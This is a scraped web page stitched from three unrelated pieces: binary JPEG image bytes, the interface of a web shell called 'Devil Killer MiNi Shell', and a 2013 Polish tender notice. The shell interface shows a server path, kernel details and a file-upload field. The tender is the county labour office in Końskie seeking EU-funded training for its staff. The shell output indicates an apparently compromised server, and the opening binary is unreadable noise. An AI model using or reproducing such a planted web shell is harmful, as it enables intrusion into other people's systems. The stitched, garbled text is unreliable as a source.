JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/160157-N-2013.html

<p class="kh_header"><b>Końskie: Zorganizowanie i przeprowadzenie szkoleń oraz ich techniczna organizacja dla 7 pracowników ( sześciu pośredników pracy - Zadanie 2 i jednego doradcy zawodowego - Zadanie 1) Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna kadra  współfinansowanego środkami Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 160157 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń oraz ich techniczna organizacja dla 7 pracowników ( sześciu pośredników pracy - Zadanie 2 i jednego doradcy zawodowego - Zadanie 1) Powiatowego Urzędu Pracy w Końskich w ramach projektu Profesjonalna kadra  współfinansowanego środkami Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1. ( CZĘŚĆ 1)

Temat szkolenia : Metoda edukacyjna- szkolenie otwarte.
Cel szkolenia : 
Poznanie teoretycznych podstaw Metody Edukacyjnej oraz nabycie umiejętności praktycznego zastosowania podejścia edukacyjnego w poradnictwie zawodowym w formie indywidualnej i grupowej.

Program szkolenia musi zawierać następujące zagadnienia :
1. Podstawy teoretyczne Metody edukacyjnej :
- operacyjna teoria rozwoju,
- humanistyczna koncepcja człowieka,
- koncepcja porady,
- koncepcja świata i zawodów.
2. Praktyczne zastosowanie Metody Edukacyjnej:
- ćwiczenia stosowane na czterech etapach procesu podejmowania decyzji,
- ćwiczenia dotyczące samopoznania,
- ćwiczenia dotyczące poznania świata pracy,
- proces podejmowania decyzji.

Liczba uczestników szkolenia 		-	1 osoba (doradca zawodowy).
Liczba godzin dydaktycznych 		-	40  h.
Czas trwania szkolenia 			-	5   dni.
Termin realizacji szkolenia 		-	wrzesień 2013 r.

Rezultaty ( efekty kształcenia):
Poznanie podstaw teoretycznych oraz umiejętności zastosowania podejścia edukacyjnego w pracy z różnymi grupami klientów - osoby bezrobotne i poszukujące pracy.



ZADANIE 2. ( CZĘŚĆ 2)

Temat szkolenia : Aktywizacja zawodowa klienta do 30 roku życia i powyżej 50 roku życia - optymalizowanie skuteczności działań Urzędu Pracy - szkolenie otwarte.

Cel szkolenia : 

Celem szkolenia jest podniesienie kwalifikacji i umiejętności zawodowych pracowników PUP na rzecz aktywizacji zawodowej osób do 30 roku życia i osób 50 +. Usystematyzowanie wiedzy pracowników Publicznych Służb Zatrudnienia oraz poznanie nowoczesnych metod pracy z osobami bezrobotnymi z uwzględnieniem wskazanej grupy klientów mających trudności z odnalezieniem się na rynku pracy. 

Program szkolenia musi zawierać następujące zagadnienia:
1. Portret osoby zarejestrowanej w PUP w szczególności osób długotrwale bezrobotnych 50+ i do 30 roku życia.
2. Określenie celów i oczekiwań klientów urzędu pracy.
3. Rola i współpraca kluczowych pracowników w procesie aktywizacji zawodowej osób bezrobotnych.
4. Specyfika pracy z osobami w szczególnej sytuacji na rynku pracy.
5. Profilowanie instrumentów rynku pracy i ich odpowiedni dobór dla określonej grupy profilowej.
6. Nowoczesne metody aktywizacji osób bezrobotnych do 30 roku życia i powyżej 50 roku życia 
7. Badanie kompetencji klienta w celu wykorzystania ich w procesie aktywizacji zawodowej.
8. Działania względem osób poszukujących zatrudnienia i oddalonych od rynku pracy. 

Liczba uczestników szkolenia 		-	6 osób ( pośrednicy pracy).
Liczba godzin dydaktycznych 		-	30 h.
Czas trwania szkolenia 			-	4 dni.
Termin realizacji szkolenia 		-	od dnia 01.10.2013r.  do 18 .10.2013r.

Rezultaty ( efekty kształcenia):
Szkolenie ma na celu wprowadzenie skutecznych metod obsługi klienta, przeprowadzenie właściwej diagnozy potrzeb  i oczekiwań oraz trafnego wyboru odpowiedniej i najbardziej skutecznej formy wsparcia klienta.

Metody i techniki jakie wykonawca ma obowiązek zastosować podczas szkolenia dotyczące poszczególnych zadań:
- wykłady - podczas których nastąpi werbalna prezentacja tematu przez prowadzącego szkolenie przy wykorzystaniu rzutnika multimedialnego, ekranu, tablicy flip chart ;
- warsztaty - na których materiał poznany na wykładach zostanie lepiej przyswojony przez uczestników szkolenia, zaś opanowane techniki zostaną wdrożone  w przyszły system pracy z bezrobotnym;
- dyskusje, konsultacje - dzięki którym, zaistnieje możliwość  uszczegółowienia uzyskanych informacji.

Zgodnie z przepisami dotyczącymi kształcenia dorosłych w formach pozaszkolnych program nauczania każdej formy kształcenia powinien zawierać :
-nazwę formy kształcenia;
-czas trwania i sposób jej organizacji;
-wymagania wstępne dla uczestników;
-cele kształcenia;
-plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar;
-treści kształcenia w zakresie poszczególnych zajęć edukacyjnych;
-wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;
-sposób sprawdzania efektów kształcenia.
Kwestie organizacyjne dotyczące poszczególnych zadań ( dotyczy zadania 1,2):
a) Wykonawca obowiązany jest  zapewnić:
transport  uczestnikom szkolenia wraz z posiadanymi przez nich bagażami z parkingu przy              ul. Spółdzielczej 3 w Końskich do miejsca szkolenia  i z powrotem, ewentualnie w cenę szkolenia Wykonawca musi wliczyć koszty dojazdu z/ na szkolenie ,
- zakwaterowanie wraz z noclegiem w hotelu o standardzie minimum trzy gwiazdkowym na okres szkolenia,
- pełne wyżywienie dla uczestników każdego dnia szkolenia

b) Zajęcia muszą być prowadzone w salach szkoleniowych zlokalizowanych w hotelach o standardzie minimum 3 - gwiazdkowym lub w ośrodkach konferencyjno - szkoleniowych  odpowiadających standardem hotelowi 3-gwiazdkowemu  - zgodnie z przepisami bezpieczeństwa i higieny pracy.
c) Sala do prowadzenia zajęć musi być klimatyzowana z odpowiednią wizualizacją ( logo PO KL            i logotyp Unii Europejskiej / dwanaście złotych pięcioramiennych gwiazd na błękitnym tle                    z odwołaniem słownym do Unii Europejskiej  i Europejskiego Funduszu Społecznego , Wykonawca musi ponadto zamieścić informację o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego), wyposażona  w rzutnik do prezentacji multimedialnej, laptopa oraz tablicę  flip chart.
d) W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu rozpoczęcia szkolenia Wykonawca zapewni nocleg zgodny z powyższym opisem, kolację w przeddzień szkolenia oraz śniadanie w dniu rozpoczynającym szkolenie. Ostatni dzień szkolenia musi zakończyć się             w godzinach umożliwiających powrót uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia
e) Wykonawca zobowiązany jest zapewnić wyżywienie dla każdego uczestnika szkolenia podczas każdego dnia , w którym będą odbywać się zajęcia szkoleniowe. Wyżywienie musi obejmować :
-    śniadania  (zapewnić jedno więcej śniadanie, jeśli dojazd dzień wcześniej przed rozpoczęciem zajęć )
- co najmniej 2 przerwy kawowe dziennie ( kawa , herbata, napoje niegazowane, soki owocowe -       2 rodzaje, woda, ciastka deserowe).
- obiady składające się z minimum dwóch dań tj. zupy , dania głównego i deseru . Podczas obiadu należy zapewnić również herbatę, kawę, wodę i soki owocowe -       2 rodzaje,
-  kolacje (zapewnić jedną więcej kolacje, jeśli dojazd dzień wcześniej przed rozpoczęciem zajęć).
Miejsce wydawania posiłków powinno znajdować się w tym samym obiekcie, w którym prowadzone są szkolenia przy czym niedopuszczalne jest, aby posiłki serwowano w ramach jednego pomieszczenia,    w którym będzie odbywać się szkolenie.
f) Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie , przeprowadzenie i obsługę szkolenia, zapewnienie materiałów dydaktycznych oraz pomocy szkoleniowych, zapewnienie trenera szkolenia i osoby będącej koordynatorem szkolenia. Osoba wyznaczona w tym celu przez Wykonawcę musi przebywać ( przez cały okres trwania szkolenia) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i powinna dysponować numerem telefonu kontaktowego.
g) Szkolenie ma odbyć się  w odległości nie bliższej niż 150 km od granicy administracyjnej miasta Końskie  jednak nie dalszej niż 250 km od granicy miasta Końskie.
h) Wykonawca winien zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków NNW dla wszystkich uczestników szkoleń od pierwszego do ostatniego dnia szkolenia.
i) Wykonawca musi zapewnić dla każdego uczestnika szkolenia materiały szkoleniowe w formie skryptów (papierowych i na nośniku elektronicznym)dla opisanego zakresu szkolenia objętego umową oraz materiały biurowe: notatnik, długopis automatyczny, dwa zakreślacze, teczkę A4 z rączką z utwardzonego kartonu wraz  ze szczegółowym programem szkolenia  ( skrypty w formie papierowej i elektronicznej oraz teczki A4 muszą być opatrzone logo PO KL i logotypem Unii Europejskiej/ dwanaście złotych pięcioramiennych gwiazd na błękitnym tle z odwołaniem słownym do Unii Europejskiej  i Europejskiego Funduszu Społecznego oraz informację o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej   w ramach Europejskiego Funduszu Społecznego).
Materiały szkoleniowe oraz materiały biurowe każdy z uczestników szkolenia dostaje na własność.
J) Po zakończeniu szkolenia Wykonawca musi wydać uczestnikom szkolenia zaświadczenie potwierdzające udział w szkoleniu.

Zaświadczenie to musi być wydane zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010r. Nr 177 poz.1193 z późniejszymi zmianami - rozporządzenie MPiPS z dnia 12 grudnia 2011 r. zmieniające rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy, lub na wzorze zgodnym z rozporządzeniem MEN z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych.

k) Wykonawca zobowiązany jest udostępnić Zamawiającemu dokumenty związane z realizowanym Projektem, w tym dokumenty  finansowe , w terminie określonym przez  Zamawiającego.
l) Wykonawca jest zobowiązany umożliwić Zamawiającemu oraz Wojewódzkiemu Urzędowi Pracy       w Kielcach - Instytucji Wdrażającej ( Instytucji Pośredniczącej II stopnia), dokonanie kontroli             w miejscach realizacji projektu.
m) Wykonawca ma obowiązek prowadzić podczas szkoleń listę obecności uczestników szkolenia.
n) Wykonawca ma obowiązek przeprowadzić wśród uczestników szkolenia, ankietę dotyczącą jakości szkolenia . 
o) Szkolenie ma być realizowane zgodnie z programem szkolenia. Zajęcia muszą odbywać się codziennie w dni powszednie. Nie mogą odbywać się w sobotę , niedzielę oraz w dni ustawowo wolne od pracy. Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych.
p) Szkolenie musi  być przeprowadzone przez odpowiednią kadrę szkoleniową.

q) Wykonawca ma obowiązek wszystkie dokumenty wymagane przez Zamawiającego oznaczyć logo PO KL i logotypem Unii Europejskiej dwanaście złotych pięcioramiennych gwiazd na błękitnym tle         z odwołaniem słownym do Unii Europejskiej   i Europejskiego Funduszu Społecznego , ponadto Wykonawca musi  na żądanych dokumentach zamieścić informację o realizowaniu projektu współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego     i przekazać te dokumenty Zamawiającemu :
zaświadczenie o ukończeniu szkolenia, musi być wydane zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010r. Nr 177 poz.1193 z późniejszymi zmianami - rozporządzenie MPiPS z dnia 12 grudnia 2011 r. zmieniające rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy, lub na wzorze zgodnym z rozporządzeniem MEN z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych;
- ankietę dotyczącą jakości szkolenia ;
- listę obecności uczestników szkolenia;
- dziennik zajęć zgodny z programem szkolenia;
- potwierdzenie otrzymania materiałów dydaktycznych;
- imienny wykaz osób, które ukończyły szkolenie;
- fakturę za wykonane szkolenie.

Absolwenci kursu po jego zakończeniu otrzymują następujący dokument :

1.	Zaświadczenie ukończenia kursu zawierające: numer z rejestru wydanych zaświadczeń, imię     i nazwisko oraz numer PESEL uczestnika (w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce   i datę wydania zaświadczenia, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie -  dokument oznaczony w następujący sposób:
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny  Kapitał Ludzki, Priorytet VI,                   Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.Zaświadczenie to musi być  wydane zgodnie z wytycznymi rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. z 2010 r., Nr 177, poz.1193 z późn. zm. - rozporządzenie MP i PS z dnia 12 grudnia 2011 r. zmieniające rozporządzenie w sprawie standardów i warunków prowadzenia usług rynku pracy).

Wykonawca może wydać uczestnikom kursu zaświadczenie zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego                       w formach pozaszkolnych.

Wykonawca zobowiązany jest do przeprowadzenia ankiety ewaluacyjnej wśród uczestników szkolenia.

Zamawiający dokona zapłaty za w/w szkolenie po jego zakończeniu oraz przedłożeniu dokumentów wymienionych w umowie po podpisaniu przez strony zgodnego protokołu odbioru usługi.

2. Znak sprawy nadany przez Zamawiającego : PUP OA 271-15/13..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych , co najmniej 2 ( dwóch ) głównych usług t. j. usług szkoleniowych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu osób , które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług - 1 osoba.

Trenerem musi być osoba, która spełnia poniższe wymagania w zakresie wykształcenia                               i doświadczenia :
- posiadająca wykształcenie wyższe ;
- przeprowadziła minimum 2 szkolenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie odpowiadającym przedmiotowi zamówienia t. j. usługi szkoleniowe o tematyce zgodnej z przedmiotem zamówienia (zgodnie z zadaniem 1 lub 2) dla pracowników Publicznych Służb Zatrudnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-wykonawca do oferty dołącza dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania  oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.  Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony.
W przypadku złożenia  odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej - dokument taki musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

-wypełniony Formularz ofertowy ( załącznik nr 1 do SIWZ ) 

-wzór programu szkolenia ( załącznik nr 7 do SIWZ) .
-podpisane przez wykonawcę lub upoważnionego pełnomocnika oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 ( załącznik nr 2 do SIWZ ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie wykonawcy w realizacji usług szkoleniowych - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru w następujący sposób :
a) w uzasadnionych przypadkach dopuszcza się zmianę kadry prowadzącej szkolenie, pod warunkiem, że proponowana kadra będzie spełniała warunki opisane w niniejszej specyfikacji. Informacja o zmianie musi wpłynąć do zamawiającego na piśmie na co najmniej 1 dzień przed zaistniałą okolicznością.
b) w uzasadnionych przypadkach dopuszcza się zmianę miejsca prowadzenia szkolenia. Informacja     o zmianie musi wpłynąć do zamawiającego na piśmie co najmniej 5 dni roboczych przed rozpoczęciem szkolenia. W przypadku nagłych zdarzeń losowych termin ten nie musi być zachowany. Informacja musi wpłynąć na piśmie do Zamawiającego niezwłocznie po zaistniałym zdarzeniu.
